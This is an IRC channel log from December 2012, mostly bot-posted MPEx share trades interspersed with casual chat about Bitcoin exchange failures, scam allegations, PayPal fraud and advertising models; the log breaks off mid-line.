[S.MPOE] 3921 @ 0.0005066 = 1.9864 BTC [-] Dec 03 15:03:40 [MPEX] [S.MPOE] 10062 @ 0.0005042 = 5.0733 BTC [-] Dec 03 15:03:41 [MPEX] [S.MPOE] 15504 @ 0.00050404 = 7.8146 BTC [-] Dec 03 15:03:43 [MPEX] [S.MPOE] 6063 @ 0.00050402 = 3.0559 BTC [-] Dec 03 15:06:17 [MPEX] [S.MPOE] 23337 @ 0.00050402 = 11.7623 BTC [-] Dec 03 15:06:22 [MPEX] [S.MPOE] 1763 @ 0.00050399 = 0.8885 BTC [-] Dec 03 15:10:36 [MPEX] [S.MPOE] 4321 @ 0.00050973 = 2.2025 BTC [+] Dec 03 15:10:37 [MPEX] [S.MPOE] 4856 @ 0.00050986 = 2.4759 BTC [+] Dec 03 15:10:41 [MPEX] [S.MPOE] 12593 @ 0.00051071 = 6.4314 BTC [+] Dec 03 15:11:58 [MPEX] [S.MPOE] 4321 @ 0.00050411 = 2.1783 BTC [-] Dec 03 15:12:00 [MPEX] [S.MPOE] 9337 @ 0.00050399 = 4.7058 BTC [-] Dec 03 15:12:00 [MPEX] [S.MPOE] 7310 @ 0.00050396 = 3.6839 BTC [-] Dec 03 15:20:41 [MPEX] [O.BTCUSD.C120T] 4 @ 0.24231123 = 0.9692 BTC [-] Dec 03 15:25:48 [MPEX] [S.MPOE] 18900 @ 0.00050513 = 9.547 BTC [+] Dec 03 15:29:36 [MPEX] [S.MPOE] 1000 @ 0.00050513 = 0.5051 BTC [+] Dec 03 15:29:41 [MPEX] [S.MPOE] 14700 @ 0.00050396 = 7.4082 BTC [-] Dec 03 15:33:26 [MPEX] [S.MPOE] 3790 @ 0.00050396 = 1.91 BTC [-] Dec 03 15:33:27 [MPEX] [S.MPOE] 7650 @ 0.00050394 = 3.8551 BTC [-] Dec 03 15:33:32 [MPEX] [S.MPOE] 14010 @ 0.00050388 = 7.0594 BTC [-] Dec 03 15:34:25 [MPEX] [S.MPOE] 4321 @ 0.0005104 = 2.2054 BTC [+] Dec 03 15:34:29 [MPEX] [S.MPOE] 2414 @ 0.00051071 = 1.2329 BTC [+] Dec 03 15:35:57 [MPEX] [S.DICE] 756 @ 0.00325044 = 2.4573 BTC [-] Dec 03 15:36:02 [MPEX] [S.DICE] 2244 @ 0.00325008 = 7.2932 BTC [-] Dec 03 15:38:52 [MPEX] [S.MPOE] 16150 @ 0.00051754 = 8.3583 BTC [+] Dec 03 15:40:57 [MPEX] [S.MPOE] 5850 @ 0.00051754 = 3.0276 BTC [+] Dec 03 15:40:57 [MPEX] [S.MPOE] 8710 @ 0.00052079 = 4.5361 BTC [+] Dec 03 15:40:59 [MPEX] [S.MPOE] 140 @ 0.00052091 = 0.0729 BTC [+] Dec 03 15:41:36 [MPEX] [S.MPOE] 14200 @ 0.00051191 = 7.2691 BTC [-] Dec 03 15:54:07 [MPEX] [S.MPOE] 7698 @ 0.00051727 = 3.9819 BTC [+] Dec 03 15:55:23 [MPEX] [S.DICE] 3392 @ 0.00332977 = 11.2946 BTC [+] Dec 03 15:59:59 [MPEX] [S.MPOE] 2752 @ 0.00051727 = 1.4235 BTC [+] Dec 03 16:11:25 [MPEX] [S.MPOE] 148 @ 0.00051404 = 0.0761 BTC [-] Dec 03 16:11:26 [MPEX] [S.MPOE] 7310 @ 0.00052091 = 3.8079 BTC [+] Dec 03 16:11:28 [MPEX] [S.MPOE] 29270 @ 0.00052095 = 15.2482 BTC [+] Dec 03 16:11:29 [MPEX] [S.MPOE] 8950 @ 0.00052102 = 4.6631 BTC [+] Dec 03 16:11:30 [MPEX] [S.MPOE] 9422 @ 0.00052109 = 4.9097 BTC [+] Dec 03 16:16:15 Tax hitmen to track your spending Dec 03 16:16:15 Up to two million people are to have their credit files secretly checked under a crackdown on tax evasion to be unveiled by George Osborne to help raise another £10 billion. Dec 03 16:16:16 hehe Dec 03 16:16:28 o, aren't credit cards great. Dec 03 16:23:37 [MPEX] [S.MPOE] 21678 @ 0.00052109 = 11.2962 BTC [+] Dec 03 16:23:38 [MPEX] [S.MPOE] 7880 @ 0.00052134 = 4.1082 BTC [+] Dec 03 16:27:10 [MPEX] [S.MPOE] 11050 @ 0.00052134 = 5.7608 BTC [+] Dec 03 16:30:00 [MPEX] [S.MPOE] 17400 @ 0.00051741 = 9.0029 BTC [-] **** BEGIN LOGGING AT Mon Dec 3 23:33:19 2012 Dec 03 23:34:42 [MPEX] [S.MPOE] 4321 @ 0.0005116 = 2.2106 BTC [-] Dec 03 23:34:44 [MPEX] [S.MPOE] 10792 @ 0.00051146 = 5.5197 BTC [-] Dec 03 23:34:45 [MPEX] [S.MPOE] 1594 @ 0.00050456 = 0.8043 BTC [-] Dec 03 23:38:37 [MPEX] [S.MPOE] 4321 @ 0.0005099 = 2.2033 BTC [+] Dec 03 23:38:39 [MPEX] [S.MPOE] 23226 @ 0.00050965 = 11.8371 BTC [-] Dec 03 23:38:40 [MPEX] [S.MPOE] 3094 @ 0.00050456 = 1.5611 BTC [-] Dec 03 23:40:26 [MPEX] [S.MPOE] 4321 @ 0.00050469 = 2.1808 BTC [+] Dec 03 23:40:27 [MPEX] [S.MPOE] 17679 @ 0.00050456 = 8.9201 BTC [-] Dec 03 23:44:49 o hello! Dec 03 23:45:47 Hello Mr. MP Dec 03 23:45:55 morning? :P Dec 03 23:45:56 hello mr... hm. N ? Dec 03 23:46:19 actually it's 11 at night here lol Dec 03 23:46:53 morning will be soon Dec 03 23:47:30 For me, at night is past 2 am. So it's 11 am... Dec 03 23:47:49 My logic here might be flawed. Dec 03 23:47:56 hahaha you need sleep mebbe Dec 03 23:48:26 From 3-4 to 10-11 Dec 03 23:49:21 Now who's selling that big stack of 100 000 BVPS? Dec 03 23:50:04 hm Dec 03 23:50:17 someone bought all the shares and listed them higher price ? Dec 03 23:50:29 Apparently, yes Dec 03 23:50:40 interesting. Dec 03 23:51:50 lol Dec 03 23:51:51 Oh... you're reselling it? Where the heck did you purchase the MP? Dec 03 23:51:59 [MPEX] [S.MPOE] 4898 @ 0.00051329 = 2.5141 BTC [+] Dec 03 23:52:00 [MPEX] [S.MPOE] 4321 @ 0.00051449 = 2.2231 BTC [+] Dec 03 23:52:02 [MPEX] [S.MPOE] 12931 @ 0.0005146 = 6.6543 BTC [+] Dec 03 23:52:03 [MPEX] [S.MPOE] 9250 @ 0.00051481 = 4.762 BTC [+] Dec 03 23:54:25 [MPEX] [S.DICE] 611 @ 0.00339997 = 2.0774 BTC [+] Dec 03 23:56:10 flea market ? Dec 03 23:56:44 I was not aware such thing were available at the flea market. Dec 03 23:57:35 er Dec 03 23:57:36 i didnt Dec 03 23:57:38 was making a joke Dec 04 00:02:16 [MPEX] [S.MPOE] 4321 @ 0.00051217 = 2.2131 BTC [-] Dec 04 00:02:18 [MPEX] [S.MPOE] 14829 @ 0.00051185 = 7.5902 BTC [-] Dec 04 00:02:38 no it isn't a joke, they have a photo when that happened Dec 04 00:02:48 it's on frontpage of polimedia.us Dec 04 00:03:07 lmao Dec 04 00:03:30 actually, that photo is me (taking it) having my shit (center) hauled over the mexico/guatemala border at an illegal crossing point Dec 04 00:03:46 by some locals who carried it about 3 miles through the jungle uphill for 75 cents each Dec 04 00:03:49 one was 13. Dec 04 00:03:55 the other was his father. Dec 04 00:03:59 (i think) Dec 04 00:05:46 lol Dec 04 00:06:32 i happen to think it's a wonderful depiction of "we'll get shit done". Dec 04 00:07:46 guy is wearing an authentic traditional sweated and a baseball cap, it's quite the piece. Dec 04 00:08:02 [MPEX] [S.DICE] 3700 @ 0.00339377 = 12.5569 BTC [-] Dec 04 00:09:09 hm, without this context it isn't so clear at all Dec 04 00:09:32 yeah. Dec 04 00:09:56 that's also quite caracteristic. without the vast reams of context it's usually quite unclear wtf i'm on about. Dec 04 00:11:02 [MPEX] [S.MPOE] 4321 @ 0.00051476 = 2.2243 BTC [+] Dec 04 00:11:04 [MPEX] [S.MPOE] 1305 @ 0.00051481 = 0.6718 BTC [+] Dec 04 00:11:05 [MPEX] [S.MPOE] 4300 @ 0.00051489 = 2.214 BTC [+] Dec 04 00:11:06 [MPEX] [S.MPOE] 13900 @ 0.00051721 = 7.1892 BTC [+] Dec 04 00:11:07 [MPEX] [S.MPOE] 2963 @ 0.00052095 = 1.5436 BTC [+] Dec 04 00:11:09 [MPEX] [S.MPOE] 6698 @ 0.00052339 = 3.5057 BTC [+] Dec 04 00:13:42 [MPEX] [S.MPOE] 10300 @ 0.00052034 = 5.3595 BTC [-] Dec 04 00:13:43 [MPEX] [S.MPOE] 2700 @ 0.00052307 = 1.4123 BTC [+] Dec 04 00:16:58 when you bash the funny bone one something it is really not very funny Dec 04 00:17:34 perhaps the least aptly named bone Dec 04 00:17:34 what's with modern man's expectation of enjoyment in anything and everything! Dec 04 00:17:45 it IS funny, it's just that funny doesn't mean what you think it does. Dec 04 00:19:27 it is not funny either way Dec 04 00:22:15 ever heard the expression "does this taste funny" ? Dec 04 00:30:25 fuck Dec 04 00:30:31 another fucking parking ticket Dec 04 00:32:26 what a cunt of a day, smashed unfunny bone, parking ticket, wrangling most retarded firewalls in universe Dec 04 00:35:35 [MPEX] [S.MPOE] 27700 @ 0.00051227 = 14.1899 BTC [-] Dec 04 00:35:37 [MPEX] [S.MPOE] 1700 @ 0.00051736 = 0.8795 BTC [+] Dec 04 00:36:33 ;;google life of brian song Dec 04 00:36:34 Life of Brian ( Song) - YouTube: ; Life of Brian - Song - YouTube: ; Life of Brian Opening Animation - YouTube: Dec 04 00:43:30 [MPEX] [S.MPOE] 1621 @ 0.00051706 = 0.8382 BTC [-] Dec 04 00:43:31 [MPEX] [S.MPOE] 4321 @ 0.00051713 = 2.2345 BTC [+] Dec 04 00:43:33 [MPEX] [S.MPOE] 13004 @ 0.00051736 = 6.7277 BTC [+] Dec 04 00:44:14 pigeons : [Need] 100 BTC loan, I defaulted with others - Will pay 10.5 btc monthly minimum Dec 04 00:44:30 forum 5987695769 : bitcoinjam 5987695768 Dec 04 00:45:14 ROFLOL Dec 04 00:45:26 [MPEX] [S.MPOE] 4321 @ 0.00051227 = 2.2135 BTC [-] Dec 04 00:45:28 [MPEX] [S.MPOE] 15150 @ 0.00051214 = 7.7589 BTC [-] Dec 04 00:45:28 [MPEX] [S.MPOE] 7471 @ 0.00051185 = 3.824 BTC [-] Dec 04 00:46:12 mircea, have you seen this https://bitcointalk.org/index.php?topic=126748.0 ? Dec 04 00:46:29 let's see Dec 04 00:46:32 another 10 points for forum and its staff. Dec 04 00:47:09 hm Dec 04 00:47:29 I'm still giving him the time. He can still ends this clearly. Nefario must release the csv file to all the users. Dec 04 00:47:37 if he means cleanly he's insane lmao Dec 04 00:48:06 be patient, the best ones are in the end Dec 04 00:48:07 giga already ate a bucket of dry sand over the "cleanliness" of nefario's closing, what, is he going to repay his lawyer & make all the forum howlers happy ? Dec 04 00:49:24 lmao Dec 04 00:49:30 that needs some quoting Dec 04 00:49:47 meanwhile, back at the gox : https://bitcointalk.org/index.php?topic=128993.0 Dec 04 00:50:19 [MPEX] [S.MPOE] 13000 @ 0.00050594 = 6.5772 BTC [-] Dec 04 00:50:21 [MPEX] [S.MPOE] 7508 @ 0.00050841 = 3.8171 BTC [+] Dec 04 00:51:00 He is a scammer Dec 04 00:51:17 Come on OPEN your eyea Dec 04 00:51:23 eyes Dec 04 00:51:37 [MPEX] [S.MPOE] 8558 @ 0.0005132 = 4.392 BTC [+] Dec 04 00:51:38 [MPEX] [S.MPOE] 1857 @ 0.00050524 = 0.9382 BTC [-] Dec 04 00:51:50 lol Dec 04 00:52:02 who tux Dec 04 00:52:02 Taking your money without asking questions and now he is giving shareholders a hard time wtf Dec 04 00:52:03 ? Dec 04 00:52:08 gigavps Dec 04 00:52:10 oh Dec 04 00:52:54 i thought you meant nefario Dec 04 00:53:14 I voted yes, theymos is investigating, hopefully soon the TAG will arive :D Dec 04 00:53:18 also Dec 04 00:53:30 i doubt it, tbh. Dec 04 00:53:42 nef is the biggest oooh Pirateat40 is the biggest then nefario Dec 04 00:54:52 i'd say it's more like pirate (~500k claims), hasking-kludge-harnett-etco (10k-100k range) Dec 04 00:55:03 then peanuts people like the bitdaytrader dood, nefario, what have you Dec 04 00:55:24 the original mybitcoin guy belongs either tied with pirate or in the 2nd echelon, depending how you count btc then Dec 04 00:55:30 I lost probably 2-3K btc on GLBSE Dec 04 00:55:44 btc ? Dec 04 00:55:49 yeeeeeeep Dec 04 00:55:59 probably? Dec 04 00:56:00 owned lots of assets Dec 04 00:56:11 not bad. Dec 04 00:56:23 2K Yabmc, 300 Gigaming and the puremining etc Dec 04 00:56:39 are you sending info to that new zealand liquidator? Dec 04 00:56:56 oh nvm, that's bitcoinica Dec 04 00:57:00 sry Dec 04 00:57:05 whats a yabmc worth now though? 0.01? Dec 04 00:57:14 prob 0.05 Dec 04 00:57:29 PsychoticBoy im not so sure you can lump all the many defaults from ciuciu to who have you under nefario's name. Dec 04 00:57:39 now, if you were to compare scammer groups, then for sure intersangro takes the cake. Dec 04 00:57:50 [MPEX] [S.MPOE] 4321 @ 0.00051719 = 2.2348 BTC [+] Dec 04 00:57:51 I also owned 1K cuicui,.bond Dec 04 00:57:51 [MPEX] [S.MPOE] 9946 @ 0.00051736 = 5.1457 BTC [+] Dec 04 00:57:52 [MPEX] [S.MPOE] 5350 @ 0.00052287 = 2.7974 BTC [+] Dec 04 00:57:53 [MPEX] [S.MPOE] 10735 @ 0.00052339 = 5.6186 BTC [+] Dec 04 00:58:01 100 btc Dec 04 00:58:12 jesus god, we managed to get in a word edgewise past assbot. Dec 04 00:58:17 you gave money to that crack head Dec 04 00:58:25 but heey, dont invest what you can not afford to LOSE Dec 04 00:58:28 dub he doesn't read trilema :D Dec 04 00:58:39 clearly Dec 04 00:59:17 lost more than 25K$ at current rate Dec 04 01:05:32 [MPEX] [S.MPOE] 2464 @ 0.00050524 = 1.2449 BTC [-] Dec 04 01:08:38 [MPEX] [S.MPOE] 28240 @ 0.00050519 = 14.2666 BTC [-] Dec 04 01:08:39 [MPEX] [S.MPOE] 1260 @ 0.00051106 = 0.6439 BTC [+] Dec 04 01:09:23 ;;ticker Dec 04 01:09:23 BTCUSD ticker | Best bid: 12.62000, Best ask: 12.62001, Bid-ask spread: 0.00001, Last trade: 12.62000, 24 hour volume: 26756.72915671, 24 hour low: 12.47550, 24 hour high: 12.67901, 24 hour vwap: 12.56329 Dec 04 01:09:27 o hey, not so bad. Dec 04 01:16:09 CoinPal allowed one to purchase Bitcoins with PayPal funds. PayPal payments can be reversed easily but Bitcoin payments are permanent. This asymmetry made CoinPal a constant target for PayPal fraud. After I experienced my first wave of fraud, from which I learned many lessons, CoinPal lost less than 0.9% of revenue to fraud losses. Dec 04 01:16:09 Fraudulent buyers exhibit certain characteristics that distinguish them from legitimate customers. Dec 04 01:16:18 this is actually a pretty interesting read. https://bitcointalk.org/index.php?topic=93770.0 Dec 04 01:22:10 [MPEX] [S.MPOE] 4321 @ 0.00051071 = 2.2068 BTC [-] Dec 04 01:27:56 [MPEX] [S.MPOE] 5529 @ 0.00051098 = 2.8252 BTC [+] Dec 04 01:27:57 [MPEX] [S.MPOE] 4321 @ 0.00050857 = 2.1975 BTC [-] Dec 04 01:27:58 [MPEX] [S.MPOE] 5328 @ 0.00050844 = 2.709 BTC [-] Dec 04 01:28:55 [MPEX] [S.MPOE] 4321 @ 0.00050847 = 2.1971 BTC [+] Dec 04 01:28:55 [MPEX] [S.MPOE] 10250 @ 0.00050844 = 5.2115 BTC [-] Dec 04 01:32:48 [MPEX] [S.MPOE] 2300 @ 0.00050725 = 1.1667 BTC [-] Dec 04 01:39:49 [MPEX] [S.MPOE] 2021 @ 0.00050725 = 1.0252 BTC [-] Dec 04 01:39:50 [MPEX] [S.MPOE] 14569 @ 0.00050706 = 7.3874 BTC [-] Dec 04 01:39:52 [MPEX] [S.MPOE] 4510 @ 0.00050506 = 2.2778 BTC [-] Dec 04 01:47:49 https://bitcointalk.org/index.php?topic=128692.msg1376070#msg1376070 Dec 04 01:47:55 this is getting richer. Dec 04 01:48:22 [MPEX] [S.MPOE] 31750 @ 0.00050506 = 16.0357 BTC [-] Dec 04 01:58:15 [MPEX] [S.MPOE] 4321 @ 0.00050769 = 2.1937 BTC [+] Dec 04 01:58:16 [MPEX] [S.MPOE] 15002 @ 0.00050794 = 7.6201 BTC [+] Dec 04 01:58:17 [MPEX] [S.MPOE] 1179 @ 0.00051106 = 0.6025 BTC [+] Dec 04 01:58:18 [MPEX] [S.MPOE] 6950 @ 0.00051498 = 3.5791 BTC [+] Dec 04 01:58:19 [MPEX] [S.MPOE] 17602 @ 0.00051756 = 9.1101 BTC [+] Dec 04 02:03:44 "It seems there is no help here," Dec 04 02:03:59 fucking asshole USA, created three hundred million useless fucks looking for "help" Dec 04 02:04:13 eat shit and die already, what help ? just... keel over. Dec 04 02:06:17 [MPEX] [S.MPOE] 1640 @ 0.00052029 = 0.8533 BTC [+] Dec 04 02:06:19 [MPEX] [S.MPOE] 18290 @ 0.00050506 = 9.2375 BTC [-] Dec 04 02:06:20 [MPEX] [S.MPOE] 570 @ 0.00050456 = 0.2876 BTC [-] Dec 04 02:16:23 Don't be mean to those in need who can but don't do anything. Dec 04 02:16:54 We'll need them when space invaders arrive and demand human snacks. Dec 04 02:24:05 heh Dec 04 02:24:12 unrelatedly, these look pretty good http://polimedia.us/dtng/c/src/135458062688.jpg Dec 04 02:24:24 argh Dec 04 02:25:56 Stop putting /dtng/ links in here. Dec 04 02:28:54 or your could ignore -regex dtng islt Dec 04 02:32:35 http://trilema.com/2012/adnotated-words-of-wisdom-on-the-topic-of-online-fraud/ Dec 04 02:32:43 better ? Dec 04 02:33:32 who for a time ran a Paypal hm, best quote? Dec 04 02:34:00 i have difficulty finishing sentences nowadays. Dec 04 02:34:29 dub better nao ? Dec 04 02:35:48 diff? Dec 04 02:36:14 ran a Paypal hm, let’s just quote : Dec 04 02:37:10 ran a Paypal? Dec 04 02:37:11 I guess Dec 04 02:37:42 its still not clear Dec 04 02:38:42 who ran for a time, a paypal.. hmm, lets just quote Dec 04 02:39:02 hm. Dec 04 02:39:21 [MPEX] [S.MPOE] 17200 @ 0.00052073 = 8.9566 BTC [+] Dec 04 02:39:25 its an ugly segway any way you cut it Dec 04 02:39:28 :) Dec 04 02:39:45 i added the suspensio npoints Dec 04 02:40:02 yay for open source article editing Dec 04 02:40:41 heh s/segway/segue Dec 04 02:41:02 :D Dec 04 02:41:09 i wasn't even gonna say anything. Dec 04 02:41:26 its funny how stupid assumptions make it into your personal lexicon well mine quite ofter Dec 04 02:41:30 often* Dec 04 02:41:51 maybe we should get together mircea_popescu - I'm having difficulty starting sentences Dec 04 02:42:25 Graet hahaha we'll make what, a german philosopher ? Dec 04 02:42:28 I thought people were using segway as a transition vehicle in the sense of the silly two wheel ride on thing Dec 04 02:42:32 LOL Dec 04 02:44:56 [MPEX] [S.MPOE] 10200 @ 0.00052073 = 5.3114 BTC [+] Dec 04 02:53:32 [MPEX] [S.MPOE] 4321 @ 0.00051768 = 2.2369 BTC [-] Dec 04 02:53:34 [MPEX] [S.MPOE] 16279 @ 0.00051801 = 8.4327 BTC [+] Dec 04 02:58:35 [MPEX] [S.MPOE] 4321 @ 0.00051777 = 2.2373 BTC [-] Dec 04 02:58:36 [MPEX] [S.MPOE] 2913 @ 0.00051801 = 1.509 BTC [+] Dec 04 03:01:06 [MPEX] [S.MPOE] 5600 @ 0.00052129 = 2.9192 BTC [+] Dec 04 03:01:07 [MPEX] [S.MPOE] 599 @ 0.00052138 = 0.3123 BTC [+] Dec 04 03:14:01 [MPEX] [S.MPOE] 17400 @ 0.00051932 = 9.0362 BTC [-] Dec 04 03:27:44 [MPEX] [S.MPOE] 9966 @ 0.00051932 = 5.1755 BTC [-] Dec 04 03:47:31 [MPEX] [S.MPOE] 4321 @ 0.00050535 = 2.1836 BTC [-] Dec 04 03:47:33 [MPEX] [S.MPOE] 12150 @ 0.00050501 = 6.1359 BTC [-] Dec 04 03:47:33 [MPEX] [S.MPOE] 10063 @ 0.00050456 = 5.0774 BTC [-] Dec 04 03:47:34 [MPEX] [S.MPOE] 9404 @ 0.00050431 = 4.7425 BTC [-] Dec 04 03:53:20 [MPEX] [S.MPOE] 4321 @ 0.0005169 = 2.2335 BTC [+] Dec 04 03:53:22 [MPEX] [S.MPOE] 20173 @ 0.00051677 = 10.4248 BTC [-] Dec 04 04:02:47 http://imgur.com/KmnyV.jpg Dec 04 04:04:10 classy cake Dec 04 04:05:16 heh Dec 04 04:23:19 [MPEX] [S.MPOE] 4321 @ 0.00051839 = 2.24 BTC [+] Dec 04 04:23:20 [MPEX] [S.MPOE] 7034 @ 0.00051844 = 3.6467 BTC [+] Dec 04 04:23:21 [MPEX] [S.MPOE] 11568 @ 0.00052138 = 6.0313 BTC [+] Dec 04 04:38:49 [MPEX] [S.MPOE] 4321 @ 0.00052113 = 2.2518 BTC [-] Dec 04 04:38:50 [MPEX] [S.MPOE] 13112 @ 0.00052138 = 6.8363 BTC [+] Dec 04 04:38:52 [MPEX] [S.MPOE] 9900 @ 0.00052147 = 5.1626 BTC [+] Dec 04 04:38:53 [MPEX] [S.MPOE] 17 @ 0.00052339 = 0.0089 BTC [+] Dec 04 05:06:44 [MPEX] [S.MPOE] 4321 @ 0.00051686 = 2.2334 BTC [-] Dec 04 05:06:46 [MPEX] [S.MPOE] 2532 @ 0.00051677 = 1.3085 BTC [-] Dec 04 05:06:47 [MPEX] [S.MPOE] 7500 @ 0.00050536 = 3.7902 BTC [-] Dec 04 05:06:49 [MPEX] [S.MPOE] 6796 @ 0.00050431 = 3.4273 BTC [-] Dec 04 05:06:50 [MPEX] [S.MPOE] 593 @ 0.00050373 = 0.2987 BTC [-] Dec 04 05:06:52 [MPEX] [S.MPOE] 3608 @ 0.00050368 = 1.8173 BTC [-] Dec 04 05:20:06 [MPEX] [S.DICE] [PAID] 10000000 @ 0.00004016 = 401.57162915 BTC Dec 04 05:21:08 !ticker S.DICE Dec 04 05:21:10 [MPEX:S.DICE] 1day: 0.00323801 / 0.00332259 / 0.00339997 (69900 shares, 232.25 BTC), 30day: 0.00180025 / 0.00331194 / 0.0034 (1003161 shares, 3,322.41 BTC) Dec 04 05:49:19 [MPEX] [S.MPOE] 4321 @ 0.00051592 = 2.2293 BTC [+] Dec 04 05:49:20 [MPEX] [S.MPOE] 6110 @ 0.00051576 = 3.1513 BTC [-] Dec 04 06:02:31 ;;bc,stats Dec 04 06:02:34 Current Blocks: 210825 | Current Difficulty: 3438908.9601591 | Next Difficulty At Block: 211679 | Next Difficulty In: 854 blocks | Next Difficulty In About: 5 days, 14 hours, 58 minutes, and 46 seconds | Next Difficulty Estimate: 3617413.84316241 | Estimated Percent Change: 5.19074174604 Dec 04 06:31:59 [MPEX] [S.DICE] 1701 @ 0.00339997 = 5.7833 BTC [+] Dec 04 07:07:00 [MPEX] [S.MPOE] 4321 @ 0.00052132 = 2.2526 BTC [+] Dec 04 07:07:03 [MPEX] [S.MPOE] 19429 @ 0.00052163 = 10.1347 BTC [+] Dec 04 07:29:23 [MPEX] [S.MPOE] 4321 @ 0.00051578 = 2.2287 BTC [-] Dec 04 07:29:24 [MPEX] [S.MPOE] 12539 @ 0.00051576 = 6.4671 BTC [-] Dec 04 07:41:23 [MPEX] [S.MPOE] 3700 @ 0.00052145 = 1.9294 BTC [+] Dec 04 08:30:43 [MPEX] [S.MPOE] 4321 @ 0.00051599 = 2.2296 BTC [-] Dec 04 08:30:44 [MPEX] [S.MPOE] 12187 @ 0.00051576 = 6.2856 BTC [-] Dec 04 08:30:46 [MPEX] [S.MPOE] 7800 @ 0.00051127 = 3.9879 BTC [-] Dec 04 08:35:33 [MPEX] [S.MPOE] 25100 @ 0.00051127 = 12.8329 BTC [-] Dec 04 08:42:21 [MPEX] [S.MPOE] 4321 @ 0.00051939 = 2.2443 BTC [+] Dec 04 08:42:22 [MPEX] [S.MPOE] 21778 @ 0.00051964 = 11.3167 BTC [+] Dec 04 08:43:52 [MPEX] [S.MPOE] 4321 @ 0.00051142 = 2.2098 BTC [-] Dec 04 08:43:53 [MPEX] [S.MPOE] 1700 @ 0.00051127 = 0.8692 BTC [-] Dec 04 09:25:44 [MPEX] [S.MPOE] 7479 @ 0.00050636 = 3.7871 BTC [-] Dec 04 09:26:43 mircea_popescu, about your post and results for DigitalPoint Dec 04 09:27:19 aha ? Dec 04 09:27:51 Implementing an affiliate program and getting good bitcoin services to have the ad on their website would be the only way to get good leads, probably. Dec 04 09:28:15 Or anything of the sort that gets an ad to MPEx where the good audience can see it. Dec 04 09:29:06 in principle. Dec 04 09:29:19 there is need of a good advertising system for bitcoin, Dec 04 09:29:28 one that does not allow shit publishers in at all. Dec 04 09:29:51 The issue is if it's CPC/CPM, you have to trust the publisher and general audience of a website. Dec 04 09:30:03 true. Dec 04 09:30:13 With CPA, the publisher has to trust the advertiser that he will credit all conversions. Dec 04 09:33:35 cpa has numerous problems Dec 04 09:33:52 chief among which that no serious publisher would entertain it. Dec 04 09:33:57 it's stupid through and through. Dec 04 09:35:47 Actually many advertise with such methods. Dec 04 09:35:58 heh. Dec 04 09:36:06 But yes, it might not pay as much. Dec 04 09:36:24 Everyone would like to get a high CPM. Dec 04 09:36:55 But it's just not realistic to expect advertisers to hand out cash like that all the time to every publishers when there's no results. Dec 04 09:37:02 it just doesn't make sense. the business of the publisher is publishing Dec 04 09:37:12 conversion is the business of the advertiser. Dec 04 09:37:34 you can't ask a car repair shop to "fix your car in such a way you can drive it" Dec 04 09:38:38 [MPEX] [S.MPOE] 621 @ 0.00051941 = 0.3226 BTC [+] Dec 04 09:38:40 [MPEX] [S.MPOE] 6222 @ 0.00051964 = 3.2332 BTC [+] Dec 04 09:38:41 [MPEX] [S.MPOE] 7721 @ 0.00052163 = 4.0275 BTC [+] Dec 04 09:38:42 [MPEX] [S.MPOE] 1509 @ 0.00052339 = 0.7898 BTC [+] Dec 04 09:43:12 Ah, but the advertisers can't be sure of the quality of the publisher. Dec 04 09:43:21 They'd prefer to pay for results. Dec 04 09:43:35 http://karendecoster.com/wp-content/uploads/2012/12/guns1.jpg Dec 04 09:43:55 Publishers can figure out which advertisers pays the most by being better at conversion. Dec 04 09:44:09 But I don't see why advertisers wouldn't pay for results. Dec 04 10:27:35 [MPEX] [S.BVPS] 55393 @ 0.00349995 = 193.8727 BTC [+] Dec 04 10:28:17 [MPEX] [S.BVPS] 28571 @ 0.00349995 = 99.9971 BTC [+] Dec 04 10:29:08 It's all going away! Dec 04 10:31:29 I'm not even sure how much is circulating, but not much. Dec 04 10:31:44 half of 1 million is issued on MPEx Dec 04 10:32:33 And a much small amount actually circulating Dec 04 10:32:53 rg, how much is circulating? Dec 04 10:37:31 Last I heard 175k I think but it might be more Dec 04 10:38:27 [MPEX] [S.MPOE] 13486 @ 0.00052383 = 7.0644 BTC [+] Dec 04 10:38:29 [MPEX] [S.MPOE] 8114 @ 0.00052392 = 4.2511 BTC [+] Dec 04 10:44:12 [MPEX] [S.MPOE] 6886 @ 0.00052392 = 3.6077 BTC [+] Dec 04 10:44:13 [MPEX] [S.MPOE] 5414 @ 0.00052393 = 2.8366 BTC [+] Dec 04 10:52:57 [MPEX] [S.MPOE] 15914 @ 0.00052393 = 8.3378 BTC [+] Dec 04 10:52:58 [MPEX] [S.MPOE] 2386 @ 0.000524 = 1.2503 BTC [+] Dec 04 10:57:06 [MPEX] [S.MPOE] 13340 @ 0.00052371 = 6.9863 BTC [-] Dec 04 10:57:08 [MPEX] [S.MPOE] 1360 @ 0.00051987 = 0.707 BTC [-] Dec 04 11:17:17 [MPEX] [S.MPOE] 4321 @ 0.00052388 = 2.2637 BTC [+] Dec 04 11:17:18 [MPEX] [S.MPOE] 19729 @ 0.000524 = 10.338 BTC [+] Dec 04 11:30:47 [MPEX] [S.MPOE] 4321 @ 0.0005202 = 2.2478 BTC [-] Dec 04 11:30:49 [MPEX] [S.MPOE] 8529 @ 0.00051987 = 4.434 BTC [-] Dec 04 11:35:47 [MPEX] [S.MPOE] 13817 @ 0.00051987 = 7.183 BTC [-] Dec 04 11:35:48 [MPEX] [S.MPOE] 11283 @ 0.00051914 = 5.8575 BTC [-] Dec 04 11:37:05 [MPEX] [S.MPOE] 4443 @ 0.00051914 = 2.3065 BTC [-] Dec 04 11:48:18 [MPEX] [S.DICE] 300 @ 0.00339377 = 1.0181 BTC [-] Dec 04 12:15:51 [MPEX] [S.MPOE] 17300 @ 0.00051939 = 8.9854 BTC [+] Dec 04 12:25:19 [MPEX] [S.MPOE] 17400 @ 0.00051939 = 9.0374 BTC [+] Dec 04 12:25:20 [MPEX] [S.MPOE] 4250 @ 0.000524 = 2.227 BTC [+] Dec 04 12:56:19 [MPEX] [S.MPOE] 4321 @ 0.00051922 = 2.2435 BTC [-] Dec 04 12:56:20 [MPEX] [S.MPOE] 1774 @ 0.00051914 = 0.921 BTC [-] Dec 04 12:56:22 [MPEX] [S.MPOE] 5905 @ 0.00051862 = 3.0625 BTC [-] Dec 04 13:00:24 [MPEX] [S.MPOE] 4321 @ 0.00052365 = 2.2627 BTC [+] Dec 04 13:00:25 [MPEX] [S.MPOE] 4321 @ 0.00052373 = 2.263 BTC [+] Dec 04 13:00:27 [MPEX] [S.MPOE] 15017 @ 0.000524 = 7.8689 BTC [+] Dec 04 13:02:14 [MPEX] [S.MPOE] 4321 @ 0.00051886 = 2.242 BTC [-] Dec 04 13:02:16 [MPEX] [S.MPOE] 1729 @ 0.00051873 = 0.8969 BTC [-] Dec 04 13:41:15 [MPEX] [S.MPOE] 4321 @ 0.00052381 = 2.2634 BTC [+] Dec 04 13:41:16 [MPEX] [S.MPOE] 